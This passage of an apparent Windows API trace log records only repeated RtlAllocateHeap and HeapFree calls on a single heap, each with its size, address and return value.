RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.286] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0189.286] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d3a670 [0189.286] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.286] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0189.287] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.287] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.287] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0189.287] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.287] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.287] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.288] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0189.288] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.288] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.288] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.288] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0189.289] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0189.289] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.289] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.289] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0189.289] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0189.289] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.289] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.290] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0189.290] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.290] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.290] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.290] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0189.290] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.291] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.291] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.291] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0189.291] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.291] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.291] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.291] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0189.292] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.292] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.292] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.292] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0189.292] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.293] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.293] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.293] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0189.293] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.293] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.293] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.293] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0189.294] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.294] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.294] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.294] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0189.294] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.295] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.295] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.295] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0189.295] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.295] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.295] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.295] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0189.296] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.296] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.296] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.296] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0189.296] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.297] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.297] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.297] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0189.297] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0189.297] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.297] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0189.297] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.298] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.298] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0189.298] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.298] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.298] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.298] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0189.298] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d3a670 [0189.299] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.299] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0189.299] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.299] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.299] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0189.300] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0189.300] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.300] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.300] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0189.301] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0189.301] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.301] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.301] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0189.302] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.302] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.302] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.302] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0189.302] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.303] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.303] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.303] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0189.303] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0189.303] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.304] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0189.304] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.304] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.304] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0189.304] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.305] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.305] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.305] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0189.305] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.305] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.305] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.305] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0189.306] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.306] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.306] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.306] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0189.306] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.307] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.307] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.307] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0189.307] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.307] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.307] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.307] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0189.308] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.308] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.308] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.308] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0189.308] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.309] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.309] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.309] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0189.309] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.309] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.309] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.309] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0189.310] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.310] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.310] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.310] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0189.310] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0189.311] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.311] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0189.311] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.311] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.311] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0189.312] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.312] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.312] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.312] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0189.312] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0189.313] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.313] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.313] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0189.313] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0189.313] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.313] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.313] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0189.314] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.314] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.314] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.314] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0189.314] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.315] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.315] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.315] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0189.315] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0189.315] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.315] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0189.316] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.316] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.316] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0189.316] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.316] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.316] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.317] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0189.317] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.317] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.317] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.317] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0189.317] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.318] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.318] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.318] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0189.318] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.318] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.318] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.318] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0189.319] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.319] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.319] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.319] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0189.320] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.320] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.320] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.320] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0189.320] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.320] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.321] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.321] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0189.321] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.321] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.321] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.321] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0189.321] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.322] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.322] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.322] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0189.322] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0189.322] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.322] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0189.323] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.323] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.323] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0189.323] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.323] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.323] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.323] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0189.324] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0189.324] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.324] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.324] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0189.324] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0189.325] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.325] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.325] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0189.325] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.325] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.326] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.326] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0189.326] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.326] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.326] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 